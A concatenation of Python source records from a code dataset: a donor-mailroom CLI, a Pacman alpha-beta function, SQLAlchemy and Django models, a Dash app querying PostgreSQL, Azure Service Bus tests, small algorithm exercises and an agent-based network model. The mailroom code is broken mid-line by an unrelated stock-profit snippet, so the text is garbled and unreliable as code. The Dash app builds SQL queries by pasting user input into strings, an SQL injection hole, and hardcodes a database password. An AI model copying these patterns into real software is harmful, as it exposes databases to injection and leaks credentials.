else:\n return \"Donor not found.\"\n\n def get_donations(self, name):\n if not name:\n raise ValueError(\"Please provide a donor name.\")\n\n if name in self.donors:\n return self.donors[name].donations\n else:\n return \"Donor not found.\"\n\n def compose_thank_you(self, donor):\n if not donor:\n raise ValueError(\"Please provide a donor.\")\n\n message_obj = {\n 'donor_name': donor.name,\n 'donations': sum(donor.donations)\n }\n message = 'Dear {donor_name}, thanks so much '\\\n 'for your generous donations in the amount of: '\\\n '${donations}.'.format(**message_obj)\n return message\n\n def get_donor_names(self):\n print(\"\\n\".join([donor for donor in self.donors]))\n\n def generate_rollup(self):\n for donor in self.donors:\n cur_donor = self.donors[donor]\n number = len(cur_donor.donations)\n total = sum(cur_donor.donations)\n if cur_donor.donations:\n average = float(\n format(\n sum(\n cur_donor.donations) / len(\n cur_donor.donations\n ), '.2f'\n )\n )\n else:\n average = 0\n cur_donor.rollup = dict(zip(('number', 'total', 'average'),\n (number, total, average)))\n\n def generate_table(self):\n if not self.donors:\n print('The list of donors is empty.')\n return\n self.generate_rollup()\n headings = ('Donor Name', 'Num Gifts', 'Total Given', 'Average Gift')\n print('{:20}{:<15}{:<15}{:<15}'.format(*headings))\n print('{:_<65}'.format(''))\n for donor in self.donors:\n cur_donor = self.donors[donor]\n print('{:<20}'.format(cur_donor.name),\n ('{:<15}' * len(cur_donor.rollup))\n .format(*cur_donor.rollup.values()))\n\n def generate_letters(self):\n if not self.donors:\n print('The list of donors is empty.')\n return\n self.generate_rollup()\n for donor in self.donors:\n with open(donor.replace(' ', '_') + '.txt', 'w') as outfile:\n outfile.write(self.compose_thank_you(self.donors[donor]))\n print('Letters generated: ')\n for f in pth.iterdir():\n if '.txt' in str(f):\n print(f)\n\n def multiply_by(self, factor, min_donation=None, max_donation=None):\n for donor in self.donors:\n if 
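# maxProfit above tracks the running minimum buy price by hand. The same
# one-pass idea phrased with itertools.accumulate, pairing each price with
# the cheapest price seen so far:
from itertools import accumulate

def max_profit(prices):
    if not prices:
        return None
    return max(p - m for p, m in zip(prices, accumulate(prices, min)))

assert max_profit([7, 1, 5, 3, 6, 4]) == 5
assert max_profit([7, 6, 4, 3, 1]) == 0   # falling prices -> no profit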
min_donation and max_donation:\n                filtered = filter(\n                    lambda x: x >= min_donation and x <= max_donation, self.donors[donor].donations\n                )\n            elif min_donation and not max_donation:\n                filtered = filter(\n                    lambda x: x >= min_donation, self.donors[donor].donations\n                )\n            elif not min_donation and max_donation:\n                filtered = filter(\n                    lambda x: x <= max_donation, self.donors[donor].donations\n                )\n            else:\n                filtered = self.donors[donor].donations\n            mapped = map(\n                lambda x: x * factor, filtered\n            )\n            self.donors[donor].donations = list(mapped)\n\n        newDL = DonorList(self.donors)\n        newDL.generate_table()\n\n        cli = DonorCli(newDL)\n        cli.get_selection()\n\n\nclass DonorCli:\n\n    def __init__(self, donorCollection):\n        self._donorCollection = donorCollection\n\n    @property\n    def donorCollection(self):\n        return self._donorCollection\n\n    def set_donor(self):\n        while True:\n            try:\n                name = input('Please enter a donor name: ')\n                if not name:\n                    raise ValueError\n            except ValueError:\n                print('Oops, name is required.')\n                return\n            else:\n                self.donorCollection.add_donor(name)\n                self.set_donation(name)\n                print('{} added. Current donors: '.format(name))\n                self.donorCollection.get_donor_names()\n                return\n\n    def set_donation(self, donor):\n        while True:\n            try:\n                donation = int(input('Please enter a donation amount: '))\n                if not donation > 0:\n                    raise ValueError\n            except ValueError:\n                print('Please provide a whole number greater than zero.')\n            else:\n                self.donorCollection.donors[donor].add_donation(donation)\n                print('${} donation received.'.format(donation))\n                self.get_selection()\n\n    def set_multiplier(self):\n        while True:\n            try:\n                factor = int(input('Please enter a factor to multiply by: '))\n                if not factor > 0:\n                    raise ValueError\n            except ValueError:\n                print('Please provide a whole number greater than zero.')\n            else:\n                # exit once the min/max flow has run, otherwise the factor prompt repeats forever\n                self.set_min_max(factor)\n                return\n\n    def set_min_max(self, factor):\n        init_min_max = input('Would you like to filter donations '\n                             'by min/max? y/n...\\n')[0].lower().strip()\n        if not init_min_max == 'y':\n            self.donorCollection.multiply_by(factor)\n            return\n\n        min_donation = 0\n        max_donation = 0\n\n        while True:\n            try:\n                init_min = input('Filter by min? y/n...\\n')[0].lower().strip()\n                if init_min == 'y':\n                    min_donation = int(input('Please enter a minimum donation: '))\n                    if not min_donation > 0:\n                        raise ValueError\n                init_max = input('Filter by max? 
y/n...\\n')[0].lower().strip()\n                if init_max == 'y':\n                    max_donation = int(input('Please enter a maximum donation: '))\n                    if not max_donation > min_donation:\n                        raise ValueError\n            except ValueError:\n                print('Please provide a min and max donation to filter by: ')\n            else:\n                if min_donation and max_donation:\n                    self.donorCollection.multiply_by(\n                        factor, min_donation, max_donation\n                    )\n                elif min_donation and not max_donation:\n                    self.donorCollection.multiply_by(\n                        factor, min_donation\n                    )\n                elif not min_donation and max_donation:\n                    self.donorCollection.multiply_by(\n                        factor, None, max_donation\n                    )\n                else:\n                    # no bounds were given: apply the factor unfiltered\n                    self.donorCollection.multiply_by(factor)\n                return\n\n    def accept_donation(self):\n        if not self.donorCollection.donors:\n            print('The list of donors is empty.')\n            return\n        instruction = 'Please enter a full name or'\\\n                      ' type \\'list\\' to see donors:\\n'\n        name_input = input(instruction)\n        if name_input == 'list':\n            self.donorCollection.get_donor_names()\n            self.accept_donation()\n        elif name_input in self.donorCollection.donors:\n            self.set_donation(name_input)\n        else:\n            print('Donor not found.')\n\n    def apply_selection(self, selection):\n        arg_dict = {\n            '1': self.set_donor,\n            '2': self.accept_donation,\n            '3': self.set_multiplier,\n            '4': self.donorCollection.generate_table,\n            '5': self.donorCollection.generate_letters,\n            '6': quit\n        }\n        try:\n            if not arg_dict.get(selection):\n                raise KeyError\n            arg_dict.get(selection)()\n        except KeyError:\n            print('Oops, invalid selection.')\n\n    def get_selection(self):\n        options = 'Please select from the menu:\\n'\\\n                  '1) add new donor\\n'\\\n                  '2) log donation\\n'\\\n                  '3) multiply donations\\n'\\\n                  '4) create a report\\n'\\\n                  '5) send letters to everyone\\n'\\\n                  '6) quit\\n'\n        while True:\n            selection = input(options)\n            self.apply_selection(selection)\n            if selection == '2':\n                self.get_selection()\n\n\ndef main():\n    dl = DonorList()\n    cli = DonorCli(dl)\n    cli.get_selection()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"students/stuartkershaw/lesson10/mailroom_fp.py","file_name":"mailroom_fp.py","file_ext":"py","file_size_in_byte":9931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"121147488","text":"def minValue(self, gameState, agentIndex, depth, alpha, beta):\n    v = {'value':float('inf'), 'action': Directions.STOP}\n    legalMoves = gameState.getLegalActions(agentIndex)\n\n    for action in legalMoves:\n\n        if action == Directions.STOP: continue\n\n        successorGameState = gameState.generateSuccessor(agentIndex, action)\n        successorMinMax = self.minimax(successorGameState, agentIndex + 1, depth, action, alpha, beta)\n\n        if v['value'] >= successorMinMax['value']:\n            v['value'] = successorMinMax['value']\n            v['action'] = action\n\n        if v['value'] <= alpha: return v\n\n        beta = min(beta, v['value'])\n\n    return v","sub_path":"ia/t2/example/T2-AlphaBetaAgent-minValue.py","file_name":"T2-AlphaBetaAgent-minValue.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"246063934","text":"\"\"\"nile common module.\"\"\"\nimport os\n\nCONTRACTS_DIRECTORY = \"contracts/\"\nBUILD_DIRECTORY = \"artifacts/\"\nTEMP_DIRECTORY = \".temp/\"\nABIS_DIRECTORY = f\"{BUILD_DIRECTORY}abis/\"\n\n\ndef get_all_contracts(ext=None):\n    \"\"\"Get all cairo contracts in the default contract directory.\"\"\"\n    if ext is None:\n        ext = \".cairo\"\n\n    files = list()\n    for (dirpath, _, filenames) in os.walk(CONTRACTS_DIRECTORY):\n        files += [os.path.join(dirpath, file) for file in filenames]\n\n    return 
filter(lambda file: file.endswith(ext), files)\n","sub_path":"src/nile/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"114128586","text":"\n\n# counts num of bits that are set to 1 in a positive int\ndef count_bits(x):\n num_bits = 0\n while x:\n num_bits += x & 1\n x >>= 1\n return num_bits\n\nprint(count_bits(12))\n","sub_path":"Primitive Types/Elements/count_bits.py","file_name":"count_bits.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"490633556","text":"from . import db\n\n\n\nclass Autore(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n nome = db.Column(db.String(20), nullable=False)\n biografia = db.Column(db.Text)\n stile = db.Column(db.String(50))\n periodo = db.Column(db.String(100))\n\n\n immagini = db.relationship('ImmagineAutore', backref='autore', lazy='dynamic',\n cascade='all')\n\n\n opere = db.relationship('Opera', backref='autore', lazy='dynamic', \n cascade='all')\n\n\n def __init__(self, nome, biografia='', stile='', periodo=''):\n self.nome = nome\n self.biografia = biografia\n self.stile = stile\n self.periodo = periodo\n\n\n\n def __repr__(self):\n return '''\n id: {}\n nome: {}\n biografia: {}\n stile: {}\n periodo: {}\n '''.format(self.id, \n self.nome,\n self.biografia,\n self.stile,\n self.periodo)\n\n\n\n def light_serialize(self):\n return {\n 'id': self.id,\n 'nome': self.nome,\n 'stile': self.stile,\n 'periodo': self.periodo\n }\n\n\n\n def serialize(self):\n r = self.light_serialize()\n r['biografia'] = self.biografia\n r['immagini'] = [i.light_serialize() for i in self.immagini]\n r['opere'] = [ o.light_serialize() for o in self.opere ]\n return r\n\n\n\n\nclass ImmagineAutore(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n filename = db.Column(db.String, nullable=False)\n autore_id = db.Column(db.Integer, db.ForeignKey('autore.id'), nullable=False)\n ## autore da backref \n\n def __init__(self, filename, autore_id):\n self.filename = filename\n self.autore_id = autore_id\n\n\n def __repr__(self):\n return '''\n id: {}\n filename: {}\n autore_id: {}\n '''.format(self.id, \n self.filename, \n self.autore_id)\n\n\n\n def light_serialize(self):\n return {\n 'id': self.id,\n 'filename': self.filename,\n 'autore_id': self.autore_id\n }\n\n\n def serialize(self):\n r = self.light_serialize()\n r['autore'] = self.autore.light_serialize()\n return r\n\n","sub_path":"backend/app/model/autore.py","file_name":"autore.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"41022032","text":"from willow.willow import *\n\ndef session(me):\n if me == 0:\n add(open(\"prisoner.html\"))\n msg0 = take({\"client\": me})\n choice_0 = msg0[\"id\"]\n put({\"tag\":\"pl_0\",\"choice_0\":choice_0})\n show(\"#wait\")\n add(choice_0, \"#pchoice\")\n msg0 = take({\"tag\": \"pl_1\"})\n\n if choice_0 == msg0[\"choice_1\"] == \"confess\":\n penal = \"7\"\n elif choice_0 == \"confess\" and msg0[\"choice_1\"] == \"silence\":\n penal = \"1\"\n elif choice_0 == \"silence\" and msg0[\"choice_1\"] == \"confess\":\n penal = \"10\"\n elif choice_0 == msg0[\"choice_1\"] == \"silence\":\n penal = \"3\"\n\n show(\"#sentence\")\n add(penal, \"#penal\")\n\n elif me == 1:\n add(open(\"prisoner.html\"))\n msg1 = take({\"client\": me})\n choice_1 = 
msg1[\"id\"]\n put({\"tag\":\"pl_1\",\"choice_1\":choice_1})\n show(\"#wait\")\n add(choice_1, \"#pchoice\")\n msg1 = take({\"tag\": \"pl_0\"})\n\n if msg1[\"choice_0\"] == choice_1 == \"confess\":\n penal = \"7\"\n elif msg1[\"choice_0\"] == \"confess\" and choice_1 == \"silence\":\n penal = \"10\"\n elif msg1[\"choice_0\"] == \"silence\" and choice_1 == \"confess\":\n penal = \"1\"\n elif msg1[\"choice_0\"] == choice_1 == \"silence\":\n penal = \"3\"\n \n show(\"#sentence\")\n add(penal, \"#penal\")\n\nrun(session)","sub_path":"prisonerver2.py","file_name":"prisonerver2.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"189687963","text":"\"\"\"Datasource.py: Loads data from ontology.\"\"\"\r\n__author__ = \"Mario Sandoval\"\r\n__copyright__ = \"Copyright 2018\"\r\n__license__ = \"The University of Manchester\"\r\n__version__ = \"3.1\"\r\n__maintainer__ = \"Mario Sandoval\"\r\n__email__ = \"mario.sandovalolive@manchester.ac.uk\"\r\n__status__ = \"Development\"\r\n\r\nimport os.path, sys\r\nfilepath = os.path.abspath(os.path.join(\"/Mario/3.1/LISU\", os.pardir))\r\nsys.path.insert(0, filepath + \"/LISU\")\r\nfrom rdflib import *\r\n\r\n\r\nCEXPLS = []\r\nCNOPLS = []\r\nEXPERT = \"Expert\"\r\nNOVICE = \"Novice\"\r\nONTURL = \"https://personalpages.manchester.ac.uk/staff/mario.sandovalolive/ontology/idoo.owl\"\r\n\r\nclass Controller:\r\n def __init__(self, name, level):\r\n self.name = name\r\n self.level = level\r\n\r\ndef FindOntology(qstr):\r\n return(\"\"\"\r\n PREFIX rdf: \r\n PREFIX owl: \r\n PREFIX rdfs: \r\n PREFIX xsd: \r\n\r\n PREFIX lisu: \r\n\r\n SELECT ?controller ?level ?name\r\n WHERE\r\n {\r\n ?controller lisu:productName ?name .\r\n ?controller lisu:isAppropriate ?level .\r\n ?level rdf:type lisu:%s .\r\n }\r\n GROUP BY ?controller ?level ?name\r\n \"\"\" % qstr)\r\n\r\n# Expert users can do clip planes and more complex\r\ndef GetExpertsControllers():\r\n global CEXPLS\r\n g = Graph()\r\n g.parse(ONTURL)\r\n q = g.query(FindOntology(EXPERT))\r\n for row in q:\r\n inputDevice = Controller(str(row.name).strip(), str(row.level))\r\n CEXPLS.append(inputDevice)\r\n return CEXPLS\r\n\r\n# Novice users can only do rotation camera and movement of bricks\r\ndef GetNoviceControllers():\r\n global CNOPLS\r\n g = Graph()\r\n g.parse(ONTURL)\r\n q = g.query(FindOntology(NOVICE))\r\n for row in q:\r\n inputDevice = Controller(str(row.name).strip(), str(row.level))\r\n CNOPLS.append(inputDevice)\r\n return CNOPLS\r\n","sub_path":"Data/DataSource.py","file_name":"DataSource.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"147452347","text":"import sys\nimport dash\nimport dash_table\nimport pandas as pd\nimport dash_core_components as dcc\nfrom dash.dependencies import Output, Input, State\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport psycopg2\nimport pandas.io.sql as sqlio\n\nexternal_stylesheets=[dbc.themes.BOOTSTRAP]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\napp.config.suppress_callback_exceptions = True\n\n\napp.layout = html.Div(\n [ \n html.I(\"Lutfen sorgu yapmak istediginiz degerleri giriniz!\"),\n html.Br(),\n dcc.Input(id=\"input1\", type=\"text\", placeholder=\"Model\"),\n dcc.Input(id=\"input2\", type=\"text\", placeholder=\"Yil\", debounce=True),\n dcc.Input(id=\"input3\", type=\"text\", placeholder=\"Renk\"),\n 
dcc.Input(id=\"input4\", type=\"text\", placeholder=\"Kilometre\"),\n dcc.Input(id=\"input5\", type=\"text\", placeholder=\"Fiyat\"),\n dcc.Input(id=\"input6\", type=\"text\", placeholder=\"il\"),\n html.Button('Bring data', id='bring-data-button', n_clicks=0),\n html.Br(),\n html.Br(),\n html.Div(id='place1')\n ]\n)\n\n# Connection parameters, yours will be different\nparam_dic = {\n \"host\" : \"localhost\",\n \"database\" : \"Arabalar\",\n \"user\" : \"postgres\",\n \"password\" : \"pg05330477\"\n}\n\ndef connect(params_dic):\n \"\"\" Connect to the PostgreSQL database server \"\"\"\n conn = None\n try:\n # connect to the PostgreSQL server\n print('Connecting to the PostgreSQL database...')\n conn = psycopg2.connect(**params_dic)\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n sys.exit(1) \n print(\"Connection successful\")\n return conn\n\n\n# GET DATAFRAME\n# select cls, avg(math) from tbl_not group by cls order by cls\ndef postgresql_to_dataframe(conn, select_query, column_names):\n \"\"\"\n Tranform a SELECT query into a pandas dataframe\n \"\"\"\n cursor = conn.cursor()\n try:\n cursor.execute(select_query)\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n cursor.close()\n return 1\n \n # Naturally we get a list of tupples\n tupples = cursor.fetchall()\n cursor.close()\n \n # We just need to turn it into a pandas dataframe\n df = pd.DataFrame(tupples, columns=column_names)\n return df\n\n\n@app.callback(\n [Output(component_id='place1', component_property='children')],\n [Input(component_id='bring-data-button', component_property='n_clicks')],\n [State(component_id=\"input1\", component_property='value'),\n State(component_id=\"input2\", component_property='value'),\n State(component_id=\"input3\", component_property='value'),\n State(component_id=\"input4\", component_property='value'),\n State(component_id=\"input5\", component_property='value'),\n State(component_id=\"input6\", component_property='value')]\n)\ndef save(n,v1,v2,v3,v4,v5,v6):\n w = False\n q = \"SELECT model, yil, renk, kilometre, fiyat, il FROM cars\"\n t = \"SELECT model, yil, renk, kilometre, fiyat, il FROM cars WHERE\"\n if v1:\n t = t + \" model LIKE '%\"+ v1 +\"%'\"\n w = True\n if v2:\n if w:\n t = t + \" AND\"\n t = t + \" yil LIKE '%\"+ v2 +\"%'\"\n w = True\n if v3:\n if w:\n t = t + \" AND\"\n t = t + \" renk LIKE '%\"+ v3 +\"%'\"\n w = True\n if v4:\n if w:\n t = t + \" AND\"\n t = t + \" kilometre LIKE '%\"+ v4 +\"%'\"\n w = True\n if v5:\n if w:\n t = t + \" AND\"\n t = t + \" fiyat LIKE '%\"+ v5 +\"%'\"\n w = True\n if v6:\n if w:\n t = t + \" AND\"\n t = t + \" il LIKE '%\"+ v6 +\"%'\"\n w = True \n \n if v1 or v2 or v3 or v4 or v5 or v6:\n q = t\n \n conn = connect(param_dic)\n df = postgresql_to_dataframe(conn, q, (\"Model\", \"Yil\", \"Renk\", \"Kilometre\", \"Fiyat\", \"Il\"))\n\n\n return [dash_table.DataTable(\n id='table_ratio',\n data=df.to_dict('records'),\n columns=[{'id': c, 'name': c} for c in df.columns],\n style_cell={'textAlign': 'center', 'width': '30px', 'minWidth': '10px', 'maxWidth': '50px'},\n fixed_rows={'headers': True, 'data': 0},\n style_header={'fontWeight': 'bold'},\n style_table={'overflowX': 'auto'},\n editable=True)]\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n\n\n","sub_path":"Arabam/auto/auto/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} 
+{"seq_id":"59447227","text":"import sys\n\n\nclass Node:\n def __init__(self, key, left, right):\n self.key = key\n self.left = left\n self.right = right\n\n\ndef is_BST(node: Node, left_border=None, right_border=None):\n if not node:\n return True\n\n if left_border and node.key < left_border:\n return False\n if right_border and node.key >= right_border:\n return False\n\n return is_BST(node.left, left_border, node.key) and is_BST(node.right, node.key, right_border)\n\n\nif __name__ == '__main__':\n sys.setrecursionlimit(1_000_000)\n\n n = int(input())\n nodes = [Node(*[int(i) for i in input().split()]) for _ in range(n)]\n for node in nodes:\n node.left = None if node.left == -1 else nodes[node.left]\n node.right = None if node.right == -1 else nodes[node.right]\n\n root = nodes[0] if len(nodes) > 0 else None\n print('CORRECT' if is_BST(root) else 'INCORRECT')\n","sub_path":"src/search trees/check_if_binary_tree_is_BST_2.py","file_name":"check_if_binary_tree_is_BST_2.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"456169031","text":"from django import forms\nfrom .models import Pedido\n\n\nclass PedidoForm(forms.ModelForm):\n\n class Meta:\n model = Pedido\n fields='__all__'\n\n def __init__(self, *args, **kwargs):\n super(PedidoForm, self).__init__(*args, **kwargs)\n for field in iter(self.fields):\n\n self.fields[field].widget.attrs.update({\n 'class': 'form-control border-primary'\n })\n\n","sub_path":"pedidos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"614797593","text":"#-------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#--------------------------------------------------------------------------\n\nimport logging\nimport sys\nimport os\nimport pytest\nimport time\nfrom datetime import datetime, timedelta\n\nfrom azure.servicebus import ServiceBusClient, TopicClient, SubscriptionClient\nfrom azure.servicebus.common.message import Message, PeekMessage\nfrom azure.servicebus.common.constants import ReceiveSettleMode\nfrom azure.servicebus.common.errors import ServiceBusError\n\n\ndef get_logger(level):\n azure_logger = logging.getLogger(\"azure\")\n if not azure_logger.handlers:\n azure_logger.setLevel(level)\n handler = logging.StreamHandler(stream=sys.stdout)\n handler.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))\n azure_logger.addHandler(handler)\n\n uamqp_logger = logging.getLogger(\"uamqp\")\n if not uamqp_logger.handlers:\n uamqp_logger.setLevel(logging.INFO)\n uamqp_logger.addHandler(handler)\n return azure_logger\n\n_logger = get_logger(logging.DEBUG)\n\n@pytest.mark.liveTest\ndef test_subscription_by_subscription_client_conn_str_receive_basic(live_servicebus_config, standard_subscription):\n topic_name, subscription_name = standard_subscription\n topic_client = TopicClient.from_connection_string(live_servicebus_config['conn_str'], name=topic_name, debug=False)\n with topic_client.get_sender() as sender:\n message = Message(b\"Sample topic message\")\n sender.send(message)\n\n sub_client = SubscriptionClient.from_connection_string(live_servicebus_config['conn_str'], subscription_name, topic=topic_name, debug=False)\n with sub_client.get_receiver(idle_timeout=5) as receiver:\n count = 0\n for message in receiver:\n count += 1\n message.complete()\n assert count == 1\n\n@pytest.mark.liveTest\ndef test_subscription_by_servicebus_client_conn_str_send_basic(live_servicebus_config, standard_subscription):\n topic_name, subscription_name = standard_subscription\n client = ServiceBusClient(\n service_namespace=live_servicebus_config['hostname'],\n shared_access_key_name=live_servicebus_config['key_name'],\n shared_access_key_value=live_servicebus_config['access_key'],\n debug=False)\n\n topic_client = client.get_topic(topic_name)\n sub_client = client.get_subscription(topic_name, subscription_name)\n\n with topic_client.get_sender() as sender:\n message = Message(b\"Sample topic message\")\n sender.send(message)\n\n with sub_client.get_receiver(idle_timeout=5) as receiver:\n count = 0\n for message in receiver:\n count += 1\n message.complete()\n assert count == 1\n\n@pytest.mark.liveTest\ndef test_subscription_by_servicebus_client_list_subscriptions(live_servicebus_config, standard_subscription):\n topic_name, subscription_name = standard_subscription\n client = ServiceBusClient(\n service_namespace=live_servicebus_config['hostname'],\n shared_access_key_name=live_servicebus_config['key_name'],\n shared_access_key_value=live_servicebus_config['access_key'],\n debug=False)\n\n subs = client.list_subscriptions(topic_name)\n assert len(subs) >= 1\n assert all(isinstance(s, SubscriptionClient) for s in subs)\n assert subs[0].name == subscription_name\n assert subs[0].topic_name == topic_name\n\n@pytest.mark.liveTest\ndef test_subscription_by_subscription_client_conn_str_send_fail(live_servicebus_config, standard_subscription):\n topic_name, subscription_name = standard_subscription\n\n sub_client = SubscriptionClient.from_connection_string(live_servicebus_config['conn_str'], subscription_name, 
topic=topic_name, debug=False)\r\n    with pytest.raises(AttributeError):\r\n        sub_client.get_sender()\r\n","sub_path":"sdk/servicebus/azure-servicebus/tests/test_subscriptions.py","file_name":"test_subscriptions.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"564576489","text":"\nimport json\nfrom xml.etree import ElementTree\n\nfrom lithoxyl import Logger, AggregateSink\nfrom lithoxyl.utils import wrap_all, unwrap_all\n\n\ndef test_wrap_all_json():\n    agg_sink = AggregateSink()\n    log = Logger('wrapper_log', sinks=[agg_sink])\n\n    wrap_all(log, 'info', json)\n\n    json.loads('{}')\n\n    assert agg_sink.begin_events[0].name == 'json.loads'\n\n    unwrap_all(json)\n\n    json.loads('{}')\n\n    assert len(agg_sink.begin_events) == 3\n\n    return\n\n\ndef test_wrap_all_element_tree():\n    log = Logger('test', sinks=[])\n\n    # test old-style class wrapping / unwrapping\n    wrap_all(log, target=ElementTree)\n    unwrap_all(ElementTree)\n\n","sub_path":"lithoxyl/tests/test_wrap_all.py","file_name":"test_wrap_all.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"126007010","text":"import os\nfrom csv import *\nimport commands\n\ndata = reader(open('threads.txt', 'r'), delimiter=\" \")\ndata2=reader(open('params.txt', 'r'), delimiter=\" \")\nthreads, params = [], []\nthread_n=0\nparam_n=0\n\ntheFile = open(\"params.txt\", \"r\")\nparams = []\nfor val in theFile.read().split():\n    params.append(int(val))\ntheFile.close()\n\n# My input read assumes that every entry in params and threads is on a separate line\n# otherwise we have to change the input format\nfor row in data:\n    threads.append(int(row[0]))\n    thread_n+=1 \n#for row in data2:\n#    params.append(int(row[0]))\n#    param_n+=1 \n\n# Run the benchmark 100 times per parameter for each thread count,\n# writing one timing file per thread count.\nfor th in [1, 2, 4, 8, 16]:\n    out = open(\"t%d_full.txt\" % th, \"w\")\n    for pa in params:\n        i = 0\n        while i < 100:\n            op = commands.getoutput(\"./app \" + str(pa) + \" \" + str(th))\n            st = op[13:]\n            a, b = st.split(\" \")\n\n            out.write(str(pa) + \" \" + a + \"\\n\")\n            i += 1\n    out.close()\n\n","sub_path":"a8/160149/run1.py","file_name":"run1.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"17514007","text":"import sys\n\ndef main():\n\tnums = [int(line.strip()) for line in sys.stdin]\n\tfor n in nums:\n\t\tprint(isPerfect(n))\n\ndef sumFac(n):\n\tif n <= 1:\n\t\treturn 0\n\tsum = 1\n\t#print(n)\n\tfor i in range(2, n//2+1):\n\t\tif 
n%i==0:\n\t\t\t#print(\"{:>4}\".format(i))\n\t\t\tsum = sum + i\n\treturn sum\n\t\ndef isPerfect(n):\n\treturn n == sumFac(n)\n\t\nif __name__ == \"__main__\":\n\tmain()","sub_path":"62/perfect_62.py","file_name":"perfect_62.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"470874748","text":"\"\"\"\n\tPlease feel free to use the code without citing or crediting the author(s) mentioned below. Cheers to science :-)\n\tI'd be happy to hear from you about how to improve this code, and as to how the code may have been useful to you.\n\t\n\tAuthor: Vipin P. Veetil\n\tContact: vipin.veetil@gmail.com\n\t\n\tPaper title: Network Origins of Coordination\n\tPaper URL: http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2621852\n\t\n\tLanguage: Python\n\t\n\tModule name: main\n\"\"\"\n\n\nfrom __future__ import division\nimport parameters\nimport agents\nimport random\nimport networkx as nx\nimport sys\nimport numpy as np\nimport scipy.stats\nimport csv\nimport matplotlib.pyplot as plt\n\nclass Model(object):\n\tdef __init__(self):\n\t\tself.agents_list = []\n\t\tself.number_of_states = parameters.number_of_states\n\t\tself.states_list = range(self.number_of_states)\n\t\tself.number_of_agents = parameters.number_of_agents\n\t\tself.time_steps = parameters.time_steps\n\t\tself.measure_system_states_time_interval = parameters.measure_system_states_time_interval\n\t\tself.mean_degree = parameters.mean_degree\n\t\tself.number_of_games = parameters.number_of_games\n\t\tself.epsilon_convergence = 1 - parameters.epsilon\n\t\tself.proportion_agents_activated = parameters.proportion_agents_activated\n\t\tself.number_of_agents_activated = int(self.proportion_agents_activated * self.number_of_agents)\n\t\tself.activated_agents = []\n\t\tself.states_dynamics = dict((state, []) for state in range(self.number_of_states))\n\t\tself.converged = False\n\t\tself.convergence_sequence = []\n\t\tself.time_steps_to_convergence = None\n\t\tself.number_of_non_convergences = 0\n\t\tself.agents_network = []\n\t\tself.network_topology = parameters.network_topology\n\t\tself.watts_strogatz_rewiring_probability = parameters.watts_strogatz_rewiring_probability\n\n\n\tdef create_agents_list(self):\n\t\t\"\"\" create a list of agents \"\"\"\n\t\tself.agents_list = [agents.Agent() for count in xrange(self.number_of_agents)]\n\n\tdef assign_attributes(self):\n\t\t\"\"\" each agent is initialized with a random state \"\"\"\n\t\tfor agent in self.agents_list:\n\t\t\tagent.number_of_states = self.number_of_states\n\t\t\tagent.state = random.choice(self.states_list)\n\n\tdef create_network(self):\n\t\tif self.network_topology == \"small-world\":\n\t\t\tG = nx.watts_strogatz_graph(self.number_of_agents, self.mean_degree, self.watts_strogatz_rewiring_probability)\n\t\telif self.network_topology == \"scale-free\":\n\t\t\tG = nx.barabasi_albert_graph(self.number_of_agents, int(self.mean_degree/2))\n\t\telif self.network_topology == \"ring\":\n\t\t\tG = nx.watts_strogatz_graph(self.number_of_agents, self.mean_degree, 0)\n\t\telif self.network_topology == \"random\":\n\t\t\tG = nx.watts_strogatz_graph(self.number_of_agents, self.mean_degree, 1)\n\n\t\tmapping = dict(enumerate(self.agents_list))\n\t\tself.agents_network = nx.relabel_nodes(G, mapping)\n\n\n\tdef sample_agents(self):\n\t\tself.activated_agents = random.sample(self.agents_list, self.number_of_agents_activated)\n\n\tdef collect_neighbor_states(self):\n\t\t\"\"\" each activated agent 
